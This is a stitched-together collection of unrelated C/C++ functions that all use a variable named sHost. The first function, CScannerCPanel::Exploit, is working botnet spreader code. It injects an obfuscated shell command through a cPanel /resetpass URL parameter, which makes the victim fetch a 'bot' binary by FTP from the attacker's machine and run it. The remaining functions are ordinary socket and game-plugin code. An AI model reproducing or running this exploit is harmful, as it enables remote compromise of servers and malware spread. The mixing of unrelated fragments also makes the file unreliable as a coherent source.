bool CScannerCPanel::Exploit()
{ bool bRetVal=false; CString sSendBuf, sCmdBuf;
CString sHost(m_sSocket.m_szHost); unsigned short sPort=m_sSocket.m_sPort;
// Can't infect a host from a firewalled system, cause it needs the FTP server
if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
return false;
// Connect to the server
if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) return false;
sCmdBuf.Format("echo${BLA}-e${BLA}open${BLA}%s${BLA}%d\\\\nuser${BLA}ftp${BLA}bla\\\\nget${BLA}bot\\\\nquit\\\\n${BLA}|${BLA}ftp${BLA}-n",
g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr());
m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength());
m_sSocket.Disconnect();
if(!m_sSocket.Connect(sHost.CStr(), sPort)) return false;
sCmdBuf.Assign("./bot");
sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr());
m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength());
m_sSocket.Disconnect();
// Close the socket that was once funky fresh
m_sSocket.Disconnect(); return bRetVal;
}
bool wxGISLocalClientConnection::Connect(void)
{
if(m_bIsConnected)
return true;
wxString sHost(HOST);
unsigned short nPort(PORT);
unsigned short nTimeOut(TIMEOUT);
wxGISAppConfig oConfig = GetConfig();
if(oConfig.IsOk())
{
sHost = oConfig.Read(enumGISHKCU, wxString(wxT("wxGISCommon/tasks/host")), sHost);
nPort = oConfig.ReadInt(enumGISHKCU, wxString(wxT("wxGISCommon/tasks/port")), nPort);
nTimeOut = oConfig.ReadInt(enumGISHKCU, wxString(wxT("wxGISCommon/tasks/timeout")), nTimeOut);
}
//start conn
IPaddress addr;
addr.Hostname(sHost);
addr.Service(nPort);
// Create the socket
wxSocketClient* pSock = new wxSocketClient(wxSOCKET_WAITALL | wxSOCKET_BLOCK | wxSOCKET_REUSEADDR);
m_pSock = pSock;
m_pSock->SetEventHandler(*this, SOCKET_ID);
m_pSock->Notify(true);
m_pSock->SetNotify(wxSOCKET_CONNECTION_FLAG|wxSOCKET_LOST_FLAG);
m_pSock->SetTimeout(nTimeOut);
pSock->Connect(addr, false);
m_bIsConnecting = true;
return CreateAndRunThreads();
}
BOOL CDCNeighbour::ConnectTo(const IN_ADDR* pAddress, WORD nPort, BOOL bAutomatic)
{
CString sHost( inet_ntoa( *pAddress ) );
if ( CConnection::ConnectTo( pAddress, nPort ) )
{
WSAEventSelect( m_hSocket, Network.GetWakeupEvent(),
FD_CONNECT | FD_READ | FD_WRITE | FD_CLOSE );
theApp.Message( MSG_INFO, IDS_CONNECTION_ATTEMPTING,
(LPCTSTR)sHost, htons( m_pHost.sin_port ) );
}
else
{
theApp.Message( MSG_ERROR, IDS_CONNECTION_CONNECT_FAIL,
(LPCTSTR)sHost );
return FALSE;
}
m_nState = nrsConnecting;
m_bAutomatic = bAutomatic;
Neighbours.Add( this );
return TRUE;
}
static int fetch(float *avatar_pos, float *avatar_front, float *avatar_top, float *camera_pos, float *camera_front, float *camera_top, std::string &context, std::wstring &/*identity*/) {
for (int i=0;i<3;i++)
avatar_pos[i] = avatar_front[i] = avatar_top[i] = camera_pos[i] = camera_front[i] = camera_top[i] = 0.0f;
float ipos[3], rot[3];
bool ok;
char state;
char _context[21];
// stateptr returns byte values: 0 when map is not loaded; 8 when loaded
ok = peekProc(posptr, ipos, 12) &&
peekProc(rotptr, rot, 12) &&
peekProc(stateptr, &state, 1) &&
peekProc(contextptr, _context);
if (state == 0) {
context = std::string(""); // clear context
return true; // This results in all vectors beeing zero which tells Mumble to ignore them.
}
if (ok) {
int res = calcout(ipos, rot, avatar_pos, avatar_front, avatar_top);
if (res) {
for (int i=0;i<3;++i) {
camera_pos[i] = avatar_pos[i];
camera_front[i] = avatar_front[i];
camera_top[i] = avatar_top[i];
// Example only -- only set these when you have sane values, and make sure they're pretty constant (every change causes a sever message).
//context = std::string("server/map/blah");
//identity = std::wstring(L"STEAM_1:2:3456789");
}
_context[sizeof(_context) - 1] = '\0';
std::string sHost(_context);
// This string can be either "xxx.xxx.xxx.xxx:yyyyy" (or shorter), "loopback:0" or "" (empty) when in menus. Hence 21 size for char.
if (!sHost.empty())
{
if (sHost.find("loopback") == std::string::npos)
{
std::ostringstream newcontext;
newcontext << "{\"ipport\": \"" << sHost << "\"}";
context = newcontext.str();
}
}
return res;
}
}
return false;
}
static int fetch(float *avatar_pos, float *avatar_front, float *avatar_top, float *camera_pos, float *camera_front, float *camera_top, std::string &context, std::wstring &/*identity*/) {
for (int i=0;i<3;i++)
avatar_pos[i] = avatar_front[i] = avatar_top[i] = camera_pos[i] = camera_front[i] = camera_top[i] = 0.0f;
bool ok;
float posrot[5];
char state;
char chHostStr[21]; // We just need 21 [xxx.xxx.xxx.xxx:yyyyy]
ok = peekProc(posrotptr, posrot) &&
peekProc(stateptr, state) &&
peekProc(hostptr, chHostStr);
if (!ok)
return false;
std::string sHost(chHostStr);
// Possible values of chHostStr:
// xxx.yyy.zzz.aaa:ccccc (or shorter, e.g. x.y.z.a:cc - but it doesn't really change anything)
// loopback:0 (when a local server is started)
if (!sHost.empty())
{
if (sHost.find("loopback") == std::string::npos)
{
std::ostringstream newcontext;
newcontext << "{\"ipport\": \"" << sHost << "\"}";
context = newcontext.str();
}
}
//TODO: Implement identity
// Check to see if you are in a server and spawned
if (state == 0 || state == 1 || state == 3) {
if (state == 0) context = std::string(""); // clear context if not connected to server
return true; // Deactivate plugin
}
ok = calcout(posrot, posrot+3, avatar_pos, avatar_front, avatar_top);
if (ok) {
for (int i=0;i<3;++i) {
camera_pos[i] = avatar_pos[i];
camera_front[i] = avatar_front[i];
camera_top[i] = avatar_top[i];
}
return true;
}
return false;
}
std::string IPV4Address::GetIPAddress()
{
#ifdef _MSC_VER
return "127.0.0.1";
#else
struct ifaddrs *ifaddr, *ifa;
char host[NI_MAXHOST];
if (getifaddrs(&ifaddr) == -1)
{
return "127.0.0.1";
}
for (ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next)
{
if (ifa->ifa_addr == NULL)
continue;
int family = ifa->ifa_addr->sa_family;
if (family == AF_INET)
{
if(getnameinfo(
ifa->ifa_addr,
sizeof(struct sockaddr_in),
host,
NI_MAXHOST,
NULL,
0,
NI_NUMERICHOST)==0)
{
std::string sHost(host);
if(sHost.find("127.0.0.1")==std::string::npos)
{
return sHost;
}
}
}
}
freeifaddrs(ifaddr);
return "127.0.0.1";
#endif
}
void XPCTcpSocket::vConnect(const char *_sHost)
{
struct sockaddr_in serverAddress;
serverAddress.sin_family = AF_INET;
serverAddress.sin_port = htons(iPort);
// Resolve the IP address of the given host name
std::string sHost(_sHost);
hostType HostType;
if(sHost.find_first_not_of("0123456789. ")!=std::string::npos)
{
HostType = NAME;
XPCGetHostInfo getHostInfo(_sHost, HostType);
// Store the IP address and socket port number
serverAddress.sin_addr.s_addr =inet_addr(getHostInfo.sGetHostAddress());
}
else
{
HostType = ADDRESS;
// Store the IP address and socket port number
serverAddress.sin_addr.s_addr =inet_addr(_sHost);
}
// Connect to the given address
if (connect(iSocket, (struct sockaddr *)&serverAddress,sizeof(serverAddress)) == -1)
{
char sMsg[512];
sprintf(sMsg, "Error Connecting To Socket. %s", sGetError());
XPCException socketExcept(sMsg);
throw socketExcept;
return;
}
}
